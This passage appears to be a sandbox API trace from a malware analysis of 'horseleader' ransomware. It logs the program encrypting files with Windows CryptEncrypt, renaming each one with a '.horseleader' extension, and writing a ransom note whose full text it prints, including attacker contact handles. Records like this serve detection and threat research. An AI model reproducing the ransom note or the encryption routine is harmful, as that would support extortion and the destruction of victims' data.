nFileSizeHigh=0x0, nFileSizeLow=0x543, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0246.974] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0246.974] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 76 [0246.974] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0246.974] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0246.974] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0246.974] lstrlenW (lpString=".testttjffg") returned 11 [0246.974] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0246.974] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.974] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.974] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.975] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 76 [0246.975] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0246.975] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1347) returned 1 [0246.975] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, 
lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x543, lpOverlapped=0x0) returned 1 [0246.978] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffabd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.978] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x543, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x543, lpOverlapped=0x0) returned 1 [0246.979] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.979] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.979] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.979] CloseHandle (hObject=0x1a4) returned 1 [0246.979] GetProcessHeap () returned 0x780000 [0246.979] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.979] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF.horseleader") returned 88 [0246.979] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft 
shared\\themes14\\edge\\preview.gif.horseleader")) returned 1 [0246.980] GetProcessHeap () returned 0x780000 [0246.980] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.980] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x6722, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0246.980] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0246.980] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 77 [0246.980] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0246.980] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0246.980] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0246.980] lstrlenW (lpString=".testttjffg") returned 11 [0246.980] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0246.980] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.980] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.980] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft 
shared\\themes14\\edge\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.981] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 77 [0246.981] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0246.981] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=26402) returned 1 [0246.981] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.984] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.984] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.985] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1722, lpOverlapped=0x0) returned 1 [0246.985] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffe8de, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.985] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1722, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1722, lpOverlapped=0x0) returned 1 [0246.985] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.985] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, 
nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.985] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.985] CloseHandle (hObject=0x1a4) returned 1 [0246.985] GetProcessHeap () returned 0x780000 [0246.985] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.985] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG.horseleader") returned 89 [0246.986] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\thmbnail.png.horseleader")) returned 1 [0246.986] GetProcessHeap () returned 0x780000 [0246.986] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.986] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x6722, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0246.987] FindClose (in: hFindFile=0x7c6760 | out: 
hFindFile=0x7c6760) returned 1 [0246.987] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\#Decrypt#.txt") returned 78 [0246.987] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0246.987] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. 
\r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0246.987] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0246.988] lstrlenA (lpString="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") returned 1368 [0246.989] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0246.989] CloseHandle (hObject=0x158) returned 1 [0246.989] GetProcessHeap () returned 0x780000 [0246.989] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0246.989] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51fe2db0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="EVRGREEN", cAlternateFileName="")) returned 1 [0246.989] lstrcmpiW (lpString1="EVRGREEN", lpString2="Windows") returned -1 [0246.989] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN") returned 68 [0246.989] lstrcmpW (lpString1="EVRGREEN", lpString2=".") returned 1 [0246.989] lstrcmpW (lpString1="EVRGREEN", lpString2="..") returned 1 
[0246.989] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0246.989] GetProcessHeap () returned 0x780000 [0246.989] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0246.989] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\*") returned 70 [0246.989] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51fe2db0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0246.991] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0246.991] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\.") returned 70 [0246.991] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0246.991] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51fe2db0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0246.992] lstrcmpiW (lpString1="..", lpString2="Windows") 
returned -1 [0246.992] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\..") returned 71 [0246.992] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0246.992] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0246.992] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc37d800, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x52008f10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfc37d800, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0x12dee, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="EVRGREEN.ELM", cAlternateFileName="")) returned 1 [0246.992] lstrcmpiW (lpString1="EVRGREEN.ELM", lpString2="Windows") returned -1 [0246.992] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\EVRGREEN.ELM") returned 81 [0246.992] StrStrIW (lpFirst="EVRGREEN.ELM", lpSrch=".horseleader") returned 0x0 [0246.992] lstrcmpW (lpString1="EVRGREEN.ELM", lpString2="#Decrypt#.txt") returned 1 [0246.992] lstrcmpW (lpString1="EVRGREEN.ELM", lpString2="_uninstalling_.png") returned 1 [0246.992] lstrlenW (lpString=".testttjffg") returned 11 [0246.992] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\EVRGREEN.ELM", lpSrch=".testttjffg") returned 0x0 [0246.992] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.992] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.992] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\EVRGREEN.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\evrgreen.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.993] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\EVRGREEN.ELM") returned 81 [0246.993] StrStrW (lpFirst="EVRGREEN.ELM", lpSrch=".txt") returned 0x0 [0246.993] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=77294) returned 1 [0246.993] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.993] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.996] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.996] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.997] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x6ef7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.997] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.997] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.997] WriteFile (in: 
hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.997] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xddee, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.997] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.998] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.998] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.998] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.998] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.998] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.998] CloseHandle (hObject=0x1a4) returned 1 [0246.999] GetProcessHeap () returned 0x780000 [0246.999] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.999] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\THEMES14\\EVRGREEN\\EVRGREEN.ELM.horseleader") returned 93 [0246.999] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\EVRGREEN.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\evrgreen.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\EVRGREEN.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\evrgreen.elm.horseleader")) returned 1 [0246.999] GetProcessHeap () returned 0x780000 [0247.000] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.000] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6099bdd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x223, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="EVRGREEN.INF", cAlternateFileName="")) returned 1 [0247.000] lstrcmpiW (lpString1="EVRGREEN.INF", lpString2="Windows") returned -1 [0247.000] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\EVRGREEN.INF") returned 81 [0247.000] StrStrIW (lpFirst="EVRGREEN.INF", lpSrch=".horseleader") returned 0x0 [0247.000] lstrcmpW (lpString1="EVRGREEN.INF", lpString2="#Decrypt#.txt") returned 1 [0247.000] lstrcmpW (lpString1="EVRGREEN.INF", lpString2="_uninstalling_.png") returned 1 [0247.000] lstrlenW (lpString=".testttjffg") returned 11 [0247.000] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\EVRGREEN.INF", lpSrch=".testttjffg") returned 0x0 [0247.000] CryptGenRandom 
(in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.000] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.000] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\EVRGREEN.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\evrgreen.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.001] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\EVRGREEN.INF") returned 81 [0247.001] StrStrW (lpFirst="EVRGREEN.INF", lpSrch=".txt") returned 0x0 [0247.001] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=547) returned 1 [0247.001] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x223, lpOverlapped=0x0) returned 1 [0247.003] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffddd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 